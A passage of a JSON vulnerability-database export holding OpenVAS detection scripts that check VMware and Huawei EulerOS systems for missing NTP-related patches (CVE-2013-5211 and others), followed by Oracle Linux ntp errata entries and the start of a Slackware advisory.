value:\"remote_banner\");\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\",\"VMware_vCenter/build\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n\n exit(0);\n\n}\n\ninclude(\"vmware_esx.inc\");\n\nif ( ! 
vcenter_version = get_kb_item(\"VMware_vCenter/version\"))exit(0);\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\"))exit(0);\n\nfixed_builds = make_array( \"5.5.0\",\"1623099\" );\n\nif ( ! fixed_builds[ vcenter_version] ) exit( 0 );\n\nif ( int( vcenter_build ) < int( fixed_builds[ vcenter_version ] ) )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build: fixed_builds[vcenter_version], typ:'vCenter' ) );\n exit(0);\n} \n\nexit(99);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:49:00", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002 VMware vSphere updates to third party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:103915", "href": "http://plugins.openvas.org/nasl.php?oid=103915", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2014-0002.nasl 6692 2017-07-12 09:57:43Z teissa $\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \" VMware has updated vSphere third party libraries.\";\ntag_solution = \"Apply the missing patch(es).\";\n\ntag_affected = \"vCenter Server Appliance 5.5 prior to 5.5 Update 1\nVMware vCenter Server 5.5 prior 5.5 Update 1\nVMware Update Manager 5.5 prior 5.5 Update 1\nVMware ESXi 5.5 without patch ESXi550-201403101-SG\";\n\ntag_vuldetect = \"Checks for missing patches.\";\n\ntag_insight = 'a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of the\n\"monlist\" command. An attacker may send a forged request to a\nvulnerable NTP server resulting in an amplified response to the\nintended target of the DDoS attack. \n\nb. Update to ESXi glibc package\n\nThe ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\nresolve a security issue.\n\nc. 
vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\nOracle JRE is updated to version JRE 1.7 Update 45, which addresses\nmultiple security issues that existed in earlier releases of Oracle\nJRE.';\n\n\nif (description)\n{\n script_id(103915);\n script_cve_id(\"CVE-2013-5211\",\"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version (\"$Revision: 6692 $\");\n script_name(\"VMSA-2014-0002 VMware vSphere updates to third party libraries\");\n\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"5.5.0\",\"VIB:esx-base:5.5.0-1.15.1623387\",\n \"4.0.0\",\"ESXi400-201404401-SG\",\n \"4.1.0\",\"ESXi410-201404401-SG\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, 
patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:40", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002 VMware vSphere updates to third party libraries (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:103916", "href": "http://plugins.openvas.org/nasl.php?oid=103916", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2014-0002_remote.nasl 6663 2017-07-11 09:58:05Z teissa $\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \" VMware has updated vSphere third party libraries.\";\ntag_solution = \"Apply the missing patch(es).\";\n\ntag_affected = \"vCenter Server Appliance 5.5 prior to 5.5 Update 1\nVMware vCenter Server 5.5 prior 5.5 Update 1\nVMware Update Manager 5.5 prior 5.5 Update 1\nVMware ESXi 5.5 without patch ESXi550-201403101-SG\";\n\ntag_vuldetect = \"Check the build number.\";\n\ntag_insight = 'a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of thE\n\"monlist\" command. An attacker may send a forged request to a\nvulnerable NTP server resulting in an amplified response to the\nintended target of the DDoS attack. \n\nb. Update to ESXi glibc package\n\nThe ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\nresolve a security issue.\n\nc. 
vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\nOracle JRE is updated to version JRE 1.7 Update 45, which addresses\nmultiple security issues that existed in earlier releases of Oracle\nJRE.';\n\n\nif (description)\n{\n script_id(103916);\n script_cve_id(\"CVE-2013-5211\",\"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version (\"$Revision: 6663 $\");\n script_name(\"VMSA-2014-0002 VMware vSphere updates to third party libraries (remote check)\");\n\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\");\n script_mandatory_keys(\"VMware/ESX/build\",\"VMware/ESX/version\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n\n}\n\ninclude(\"vmware_esx.inc\");\n\nif( ! esxVersion = get_kb_item( \"VMware/ESX/version\" ) ) exit( 0 );\nif( ! esxBuild = get_kb_item( \"VMware/ESX/build\" ) ) exit( 0 );\n\nfixed_builds = make_array( \"5.5.0\",\"1623387\" );\n\nif( ! 
fixed_builds[esxVersion] ) exit( 0 );\n\nif( int( esxBuild ) < int( fixed_builds[esxVersion] ) )\n {\n security_message(port:0, data: esxi_remote_report( ver:esxVersion, build: esxBuild, fixed_build: fixed_builds[esxVersion] ) );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-05-06T01:07:29", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-04-30T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2020-04-30T00:00:00", "id": "OPENVAS:1361412562311220201547", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201547", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1547\");\n script_version(\"2020-04-30T12:13:13+0000\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7427\", \"CVE-2016-7428\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-30 12:13:13 +0000 (Thu, 30 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-30 12:13:13 +0000 (Thu, 30 Apr 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1547)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1547\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1547\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1547 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in 
December 2013.(CVE-2013-5211)\n\nThe broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\nntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h15\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h15\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h15\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-21T19:55:15", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-07-03T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2020-07-03T00:00:00", "id": 
"OPENVAS:1361412562311220201723", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201723", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1723\");\n script_version(\"2020-07-03T06:18:48+0000\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7427\", \"CVE-2016-7428\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-03 06:18:48 +0000 (Fri, 03 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-03 06:18:48 +0000 (Fri, 03 Jul 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1723)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", 
re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.6\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1723\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1723\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1723 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\nThe broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\nntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 3.0.6.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.6.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h15.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", 
rpm:\"ntpdate~4.2.6p5~28.h15.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h15.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2021-07-28T14:25:16", "description": "[4.2.6p5-10.0.1.el6_8.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-09T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-09-09T00:00:00", "id": "ELSA-2016-3613", "href": "http://linux.oracle.com/errata/ELSA-2016-3613.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:24:52", "description": "[4.2.6p5-22.0.1.el7_2.2]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-09T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-09-09T00:00:00", "id": "ELSA-2016-3612", "href": "http://linux.oracle.com/errata/ELSA-2016-3612.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:24:35", "description": "[4.2.6p5-15.0.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\n[4.2.6p5-15]\n- fix buffer overflow in parsing of address in ntpq and ntpdc (CVE-2018-12327)\n[4.2.6p5-14]\n- fix CVE-2016-7429 patch to work correctly on multicast client (#1422973)\n[4.2.6p5-13]\n- fix buffer overflow in datum refclock driver (CVE-2017-6462)\n- fix crash with invalid unpeer command (CVE-2017-6463)\n- fix potential crash with invalid server command (CVE-2017-6464)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-19T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2016-7429", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464", 
"CVE-2018-12327"], "modified": "2018-12-19T00:00:00", "id": "ELSA-2018-3854", "href": "http://linux.oracle.com/errata/ELSA-2018-3854.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T06:24:18", "description": "[4.2.6p5-12.0.1.el6_9.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\n[4.2.6p5-12.el6_9.1]\n- fix buffer overflow in datum refclock driver (CVE-2017-6462)\n- fix crash with invalid unpeer command (CVE-2017-6463)\n- fix potential crash with invalid server command (CVE-2017-6464)\n[4.2.6p5-12]\n- don't limit rate of packets from sources (CVE-2016-7426)\n- don't change interface from received packets (CVE-2016-7429)\n- fix calculation of root distance again (CVE-2016-7433)\n- require authentication for trap commands (CVE-2016-9310)\n- fix crash when reporting peer event to trappers (CVE-2016-9311)\n[4.2.6p5-11]\n- don't allow spoofed packets to demobilize associations (CVE-2015-7979,\n CVE-2016-1547)\n- don't allow spoofed packet to enable symmetric interleaved mode\n (CVE-2016-1548)\n- check mode of new source in config command (CVE-2016-2518)\n- make MAC check resilient against timing attack (CVE-2016-1550)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-26T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2015-7979", "CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1550", "CVE-2016-2518", "CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464"], "modified": "2017-10-26T00:00:00", "id": "ELSA-2017-3071", "href": "http://linux.oracle.com/errata/ELSA-2017-3071.html", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:33", "description": "[4.2.6p5-25.0.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\n[4.2.6p5-25]\n- don't allow spoofed packet to enable symmetric interleaved mode\n (CVE-2016-1548)\n- check mode of new source in config command (CVE-2016-2518)\n- make MAC check resilient against timing attack (CVE-2016-1550)\n[4.2.6p5-24]\n- fix crash with invalid logconfig command (CVE-2015-5194)\n- fix crash when referencing disabled statistic type (CVE-2015-5195)\n- don't hang in sntp with crafted reply (CVE-2015-5219)\n- don't crash with crafted autokey packet (CVE-2015-7691, CVE-2015-7692,\n CVE-2015-7702)\n- fix memory leak with autokey (CVE-2015-7701)\n- don't allow setting driftfile and pidfile remotely (CVE-2015-7703)\n- don't crash in ntpq with crafted packet (CVE-2015-7852)\n- check key ID in packets authenticated with symmetric key (CVE-2015-7974)\n- fix crash with reslist command (CVE-2015-7977, CVE-2015-7978)\n- don't allow spoofed packets to demobilize associations (CVE-2015-7979,\n CVE-2016-1547)\n- don't accept server/peer packets with zero origin timestamp (CVE-2015-8138)\n- fix infinite loop in ntpq/ntpdc (CVE-2015-8158)\n- fix resetting of leap status (#1242553)\n- extend rawstats log (#1242877)\n- report clock state changes related to leap seconds (#1242935)\n- allow -4/-6 on 
restrict lines with mask (#1304492)\n- explain synchronised state in ntpstat man page (#1309594)", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2016-11-09T00:00:00", "type": "oraclelinux", "title": "ntp security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2015-5194", "CVE-2015-5195", "CVE-2015-5196", "CVE-2015-5219", "CVE-2015-7691", "CVE-2015-7692", "CVE-2015-7701", "CVE-2015-7702", "CVE-2015-7703", "CVE-2015-7852", "CVE-2015-7974", "CVE-2015-7977", "CVE-2015-7978", "CVE-2015-7979", "CVE-2015-8138", "CVE-2015-8158", "CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1550", "CVE-2016-2518"], "modified": "2016-11-09T00:00:00", "id": "ELSA-2016-2583", "href": "http://linux.oracle.com/errata/ELSA-2016-2583.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:36:47", "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 